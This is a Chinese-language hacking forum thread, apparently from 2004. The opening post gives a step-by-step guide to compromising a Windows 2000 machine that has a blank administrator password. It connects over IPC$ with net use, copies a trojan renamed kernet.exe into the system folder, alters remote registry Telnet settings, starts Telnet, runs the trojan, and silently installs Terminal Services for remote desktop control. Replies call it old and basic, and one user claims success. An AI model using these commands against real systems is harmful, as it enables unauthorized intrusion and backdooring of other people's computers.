|
作者: newmyth21 [newmyth21] 论坛用户 | 登录 |
操作系统:2000 扫描器:流光或X-SCAN等 再来一个木马我用的是蓝色火焰 假设我们现在已扫描出一台有弱口令的机器,用户名是: ADMINISTRATOR 口令为:空 IP为:121.0.0.1 第一步:在命令提示符下输入:net use \\121.0.0.1\ipc$ "" /user:"administrator"成功后继续。 第二步:复制蓝色火焰的服务器端过去,我把服务器端重命名为kernet.exe,假设服务器端在C盘根目录下,在命令提示下输入 c:\>copy kernet.exe \\121.0.0.1\admin$\systme32成功后继续。不要关闭窗口。 第三步:开始---运行里输入regedit打开注册表,注册表菜单--连接网络注册表成功后,再121.0.0.1下找到以下键值: HEEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0下的NTLM键,将缺省的值"2"修改为"1"或者"0"。如果你想知道这台机器是服务器版还是专业版,可以查以下键值: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions]右边窗口ProductType键值="ServerNT就是服务器版,ProductType键值="winnt"就是专业版(是服务器版可以为它装上终端服务,那我们就可用图形控制它了,专业版不行,等一下咱们远程登陆成功后才能装) 第四步:开始----程序----管理工具有----计算机管理体制---- 操作----连接到另一台计算机输入121.0.0.1成功后在121.0.0.1 下双击服务和应用程序---双击服务---再双击右窗口telnet启动它,确定。告诉大家连接注册表和启动它的telnet服务时会有些慢,大家不要心紧。 第五步:在命令提示符下输入 telnet 121.0.0.1会你输入用户名和密码,我们输入 administrator回车,回车。成功登录后进入它装2000的盘如d盘,输入 d: 回车,cd winnt 回车 , cdsystem32回车,kernet.exe 这样就启动了木马。如果你想为它装终端服务的话输入 :c:\>query user 这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 . 2002-1-12 22:5 \\类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了. --------------------------------------------------- C:\>dir c:\sysoc.inf /s //检查INF文件的位置 c:\WINNT\inf 的目录 2000-01-10 20:00 3,770 sysoc.inf 1 个文件 3,770 字节 ----------------------------------------------------- C:\> dir c:\sysocmgr.* /s //检查组件安装程序 c:\WINNT\system32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 ----------------------------------------------------- c:\>echo [Components] > c:\wawa c:\>echo TSEnable = on >> c:\wawa //这是建立无人参与的安装参数 c:\>type c:\wawa [Components] TSEnable = on //检查参数文件 ------------------------------------------------------ c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q ----------------------------------------------------- 这一条就是真正安装组件的命令. 以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,3389终端服务就已经开启.你就可以连上去了. |
地主 发表时间: 04-01-09 13:36 |
回复: newmyth21 [newmyth21] 论坛用户 | 登录 |
我自已来顶好了,狂晕啊! |
B1层 发表时间: 04-01-11 22:36 |
回复: k_com [k_com] 论坛用户 | 登录 |
超旧帖了~~楼主再顶的话`~我怕斑竹k你哦~~~~~~~~~~~~~没多少技术成分 |
B2层 发表时间: 04-01-11 22:41 |
回复: zybzc [zybzc] 论坛用户 | 登录 |
哎 简单点` 新手碰上个人电脑 马大哈主人 依然可以连手 |
B3层 发表时间: 04-01-12 03:00 |
回复: haha52013 [haha52013] 论坛用户 | 登录 |
我成功过`` |
B4层 发表时间: 04-01-12 03:01 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号